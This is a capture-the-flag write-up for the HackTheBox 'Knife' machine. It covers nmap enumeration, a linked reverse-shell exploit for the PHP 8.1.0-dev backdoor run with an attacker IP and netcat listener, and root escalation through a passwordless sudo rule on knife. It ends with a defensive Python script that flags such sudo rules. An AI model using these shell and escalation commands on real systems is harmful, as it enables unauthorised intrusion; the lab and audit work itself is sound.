Knife HackTheBox Writeup
Scan open ports
# nmap -v -sV -p- IP
- -v for verbose mode.
- -sV for service version detection.
- -p- to scan all 65535 TCP ports.
Two ports are open on the target: OpenSSH on port 22 and Apache httpd on port 80.
Enumerate web server
view-source:http://10.10.10.242/
Check Inspect Element.
In the screenshot below, the response headers include X-Powered-By: PHP/8.1.0-dev.
Now search for an exploit for PHP/8.1.0-dev.
Exploit Link :- https://raw.githubusercontent.com/flast101/php-8.1.0-dev-backdoor-rce/main/revshell_php_8.1.0-dev.py
Download this exploit.
Run exploit
# python revshell_php_8.1.0-dev.py http://10.10.10.242 10.10.14.10 1234
(arguments: target URL, attacker IP, attacker port)
Setup Listener
# nc -nlvp PORT
PORT must be the same port passed to the exploit (1234 above).
Root Privileges Escalation
First I looked at the sudo permissions of the user.
The user could execute the knife binary as root without entering his own password.
So I created a file called "config.rb" in /tmp with the following content and gave it execute permissions. knife loads the file passed with -c as Ruby, so whatever it contains runs as root.
# echo 'exec "/bin/bash -i"' > config.rb
# chmod +x config.rb
Now run the following command:
# sudo knife user list -c config.rb
Alternatively, knife exec can evaluate Ruby directly:
# sudo /usr/bin/knife exec --exec "exec '/bin/sh -i'"
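The weakness above is a NOPASSWD sudo rule on a binary that evaluates a user-supplied Ruby file. The following audit script is an added example, not part of this writeup: it parses `sudo -l` output and flags passwordless root rules on such binaries. The sample output is constructed to mirror the rule on this box; the set of flagged binaries is an assumption seeded only with knife.

```python
import re
from dataclasses import dataclass

# Constructed sample of `sudo -l` output (not captured from the target).
SAMPLE_SUDO_L = """Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
    (root) /usr/bin/apt-get update
"""

# Binaries that load or evaluate code from a caller-controlled file. A NOPASSWD
# rule on one of these is equivalent to a NOPASSWD rule on a root shell.
# knife is the case on this page: it runs Ruby from the config given with -c.
CODE_LOADING_BINARIES = {"knife"}  # assumption: extend for your environment

_RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z_]+:\s+)*)(?P<cmds>.+)$")


@dataclass
class SudoRule:
    runas: str
    nopasswd: bool
    command: str


def parse_sudo_l(text: str) -> list[SudoRule]:
    """Extract (runas, NOPASSWD?, command) triples from `sudo -l` output."""
    rules: list[SudoRule] = []
    in_cmds = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_cmds = True  # rules follow this header line
            continue
        m = _RULE_RE.match(line) if in_cmds else None
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):  # one line may list several commands
            rules.append(SudoRule(m.group("runas").strip(), nopasswd, cmd.strip()))
    return rules


def risky_rules(rules: list[SudoRule]) -> list[SudoRule]:
    """Return passwordless root rules whose target binary evaluates user-controlled code."""
    flagged = []
    for r in rules:
        binary = r.command.split()[0].rsplit("/", 1)[-1]
        if r.nopasswd and r.runas in ("root", "ALL") and binary in CODE_LOADING_BINARIES:
            flagged.append(r)
    return flagged
```

Running `risky_rules(parse_sudo_l(SAMPLE_SUDO_L))` on the sample flags only the knife rule; the apt-get rule requires a password and is not a code loader.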